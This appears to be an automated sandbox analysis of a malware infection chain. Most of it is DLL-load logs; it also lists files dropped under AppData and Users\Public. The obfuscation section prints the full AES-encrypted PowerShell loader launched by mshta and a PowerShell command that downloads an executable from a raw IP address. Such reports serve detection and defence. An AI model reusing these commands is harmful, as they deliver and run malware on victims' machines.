Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\dqcwif.exeSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\dqcwif.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\dqcwif.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\dqcwif.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\dqcwif.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\dqcwif.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\dqcwif.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\dqcwif.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\dqcwif.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\dqcwif.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\dqcwif.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Guard.exeSection loaded: version.dll
Source: C:\Users\Public\Guard.exeSection loaded: winmm.dll
Source: C:\Users\Public\Guard.exeSection loaded: mpr.dll
Source: C:\Users\Public\Guard.exeSection loaded: wininet.dll
Source: C:\Users\Public\Guard.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: userenv.dll
Source: C:\Users\Public\Guard.exeSection loaded: uxtheme.dll
Source: C:\Users\Public\Guard.exeSection loaded: kernel.appcore.dll
Source: C:\Users\Public\Guard.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Guard.exeSection loaded: wldp.dll
Source: C:\Users\Public\Guard.exeSection loaded: napinsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: pnrpnsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wshbth.dll
Source: C:\Users\Public\Guard.exeSection loaded: nlaapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Guard.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: winrnr.dll
Source: C:\Users\Public\Guard.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: twext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dll
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: version.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: rasadhlp.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: 7A2lfjTYNf.lnkLNK file: ..\..\..\..\Windows\System32\Wbem\wmic.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000006.00000003.2212037482.000001E84F29A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2212152463.000001E84F205000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2211529393.000001E853230000.00000004.00000020.00020000.00000000.sdmp, ghepduy1325[1].6.dr
Source: Binary string: sethc.pdb source: mshta.exe, 00000006.00000003.2212037482.000001E84F29A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2212152463.000001E84F205000.00000004.00000020.00020000.00000000.sdmp, ghepduy1325[1].6.dr

Data Obfuscation

barindex
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '4734F167E688B712E3D248343D2E8F27F45EFEB66CEF33E5F71E91F4D577D03D307A3816965837CD191787DF5ED88323F20D1C6944C9100F6D044DB74B45638F201D8BAE55A1DE539BF3C012438184FFECF2A18AA75A38B5FA2B30E3775A68700359403C96690A310E0FA61DE6143A7A471CABD4AE708C72CF84B7A1DC559F9DCF0AABDD03FCA45762903F51468BEF8488494E7B7429432A3A1BAEDBF4833DEEA70781E018E4DFB87CD05CEA8267DFEEC57474934D2E72FED942DC3B6E04D01F82804DECEF13DC95D9F76B95330BE652C3F5ECAB21E4D67450285F38D92BE31580C4E736177BF71474B83457639E9C2881131387C24401F97A86AE28EF1CFA3564CF1974B4ACC0F6695257FA23A2DDB11745C35D97B3064A0BAAF7A97272149C51840237CA06689453D6A5F8B46678E8011672959BFCB6DFD142A3ED66ADE572299E442A73D667DF9462BE96290706311211F2CE31646E4040EBF2F7AA2CB9DC7FCF0E3D67762E76457BAA609917136F01E489A97E9A7FB17C6965F15CFF50FF5637D62983F02A4262193FDA98C9A16EF2DA91F27193760578614D5E2613AC07AC1CCB5EF6F587BC781DF31F55B65181C86F562B2BD2A35461CAC5C101B21214506A52C17834FA44C6E0DEF1A1E9CB0715D93135D5BBF09E6FCCE528E1DA3761E0A1F265D5F0FB3FA2E21AC770F6F27CC1EC289352FC35A8C7DE18C442B194FDCFA10DB3DA7CDE32FD8403F449D8FC75BE84A071B70C8F5544157502E7B2071633BA5B9D659AB9028E480647AA8FE41712E40CDB4E6A26F3268BFCF26F9072B471B8C282387E4DBA4EBC93609965409C1A65C0C57DF0CE49EC876F91C5A96386BD60817F78D48A9D0148412611DA9639CF9834309BE5DACA432F3ACBDFA219E5B95B26C009CFC00CF54BE154220779009DDC479CBDFEB32FC40336CC86D179FF44CD5B390F941A50D06D52FAFC8F32DB72C3505502F57C9EAA8B71200A218380D35F04EDC8E95B91FA86829B4510AD91625BBE54DB1D3237B08832E5C8289753B1D32B208E9E6AA7E281982490307DB6935EA25109C185FC165625387C55175929D993B0A9A3B1022C240A5ACB0431E98C81D66C70D1DC29B7F9909E6515937CDB3D283F4B12B4C4D6E3F28F0B7F5FD07BA8EDC2B28158165A3FB91BF281D1C320E33D3C8D25C1ABC674AB74EA1BE51CF9A35EC73C41528008D4E8200333FAB1BFEDC6C324ED62E667038A747AA71059CF2CF52ED74304019637D834465D06062AAA679880D486BEED29E51CBB32E274D08CF418E16AC10216BB620E504A77D4771DF75717D83FEB1DA9EA2224B0AB6051F81C35169397369EDE2B5FCAD429BA6B5E93A03CD2128D91B05F33C31AA36E6F16AFEB422B869409A043987E74028E99F3553B4AC0943C7347DBDB9818608468516E754F4271494E6951625143456D';function yVE ($UZpVPhOy){return -split ($UZpVPhOy -replace '..', '0x$& ')};$foocSK = yVE($ddg.SubString(0, 2016));$vAM = [System.Security.Cryptography.Aes]::Create();$vAM.Key = yVE($ddg.SubString(2016));$vAM.IV = New-Object byte[] 16;$MnEAtBA = $vAM.CreateDecryptor();$QXykJ = [System.String]::new($MnEAtBA.TransformFinalBlock($foocSK, 0,$foocSK.Length)); sal fd $QXykJ.Substring(3,3); fd $QXykJ.Substring(6)
Source: C:\Users\user\AppData\Roaming\dqcwif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/IAFkh" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '4734F167E688B712E3D248343D2E8F27F45EFEB66CEF33E5F71E91F4D577D03D307A3816965837CD191787DF5ED88323F20D1C6944C9100F6D044DB74B45638F201D8BAE55A1DE539BF3C012438184FFECF2A18AA75A38B5FA2B30E3775A68700359403C96690A310E0FA61DE6143A7A471CABD4AE708C72CF84B7A1DC559F9DCF0AABDD03FCA45762903F51468BEF8488494E7B7429432A3A1BAEDBF4833DEEA70781E018E4DFB87CD05CEA8267DFEEC57474934D2E72FED942DC3B6E04D01F82804DECEF13DC95D9F76B95330BE652C3F5ECAB21E4D67450285F38D92BE31580C4E736177BF71474B83457639E9C2881131387C24401F97A86AE28EF1CFA3564CF1974B4ACC0F6695257FA23A2DDB11745C35D97B3064A0BAAF7A97272149C51840237CA06689453D6A5F8B46678E8011672959BFCB6DFD142A3ED66ADE572299E442A73D667DF9462BE96290706311211F2CE31646E4040EBF2F7AA2CB9DC7FCF0E3D67762E76457BAA609917136F01E489A97E9A7FB17C6965F15CFF50FF5637D62983F02A4262193FDA98C9A16EF2DA91F27193760578614D5E2613AC07AC1CCB5EF6F587BC781DF31F55B65181C86F562B2BD2A35461CAC5C101B21214506A52C17834FA44C6E0DEF1A1E9CB0715D93135D5BBF09E6FCCE528E1DA3761E0A1F265D5F0FB3FA2E21AC770F6F27CC1EC289352FC35A8C7DE18C442B194FDCFA10DB3DA7CDE32FD8403F449D8FC75BE84A071B70C8F5544157502E7B2071633BA5B9D659AB9028E480647AA8FE41712E40CDB4E6A26F3268BFCF26F9072B471B8C282387E4DBA4EBC93609965409C1A65C0C57DF0CE49EC876F91C5A96386BD60817F78D48A9D0148412611DA9639CF9834309BE5DACA432F3ACBDFA219E5B95B26C009CFC00CF54BE154220779009DDC479CBDFEB32FC40336CC86D179FF44CD5B390F941A50D06D52FAFC8F32DB72C3505502F57C9EAA8B71200A218380D35F04EDC8E95B91FA86829B4510AD91625BBE54DB1D3237B08832E5C8289753B1D32B208E9E6AA7E281982490307DB6935EA25109C185FC165625387C55175929D993B0A9A3B1022C240A5ACB0431E98C81D66C70D1DC29B7F9909E6515937CDB3D283F4B12B4C4D6E3F28F0B7F5FD07BA8EDC2B28158165A3FB91BF281D1C320E33D3C8D25C1ABC674AB74EA1BE51CF9A35EC73C41528008D4E8200333FAB1BFEDC6C324ED62E667038A747AA71059CF2CF52ED74304019637D834465D06062AAA679880D486BEED29E51CBB32E274D08CF418E16AC10216BB620E504A77D4771DF75717D83FEB1DA9EA2224B0AB6051F81C35169397369EDE2B5FCAD429BA6B5E93A03CD2128D91B05F33C31AA36E6F16AFEB422B869409A043987E74028E99F3553B4AC0943C7347DBDB9818608468516E754F4271494E6951625143456D';function yVE ($UZpVPhOy){return -split ($UZpVPhOy -replace '..', '0x$& ')};$foocSK = yVE($ddg.SubString(0, 2016));$vAM = [System.Security.Cryptography.Aes]::Create();$vAM.Key = yVE($ddg.SubString(2016));$vAM.IV = New-Object byte[] 16;$MnEAtBA = $vAM.CreateDecryptor();$QXykJ = [System.String]::new($MnEAtBA.TransformFinalBlock($foocSK, 0,$foocSK.Length)); sal fd $QXykJ.Substring(3,3); fd $QXykJ.Substring(6)Jump to behavior
Source: C:\Users\user\AppData\Roaming\dqcwif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/IAFkh" -OutFile "C:\Users\Public\Guard.exe""
Source: ghepduy1325[1].6.drStatic PE information: 0xDA18FDB4 [Thu Dec 13 08:35:00 2085 UTC]
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BB7634 LoadLibraryA,GetProcAddress,19_2_00007FF6B5BB7634
Source: ghepduy1325[1].6.drStatic PE information: real checksum: 0x20826 should be: 0x6e6a6
Source: ghepduy1325[1].6.drStatic PE information: section name: .didat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD33BA00BD pushad ; iretd 5_2_00007FFD33BA00C1
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B578FD push rdi; ret 19_2_00007FF6B5B57904
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B57399 push rdi; ret 19_2_00007FF6B5B573A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD337000BD pushad ; iretd 24_2_00007FFD337000C1

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ghepduy1325[1]Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\dqcwif.exeJump to dropped file
Source: C:\Users\Public\Guard.exeFile created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ghepduy1325[1]Jump to dropped file

Boot Survival

barindex
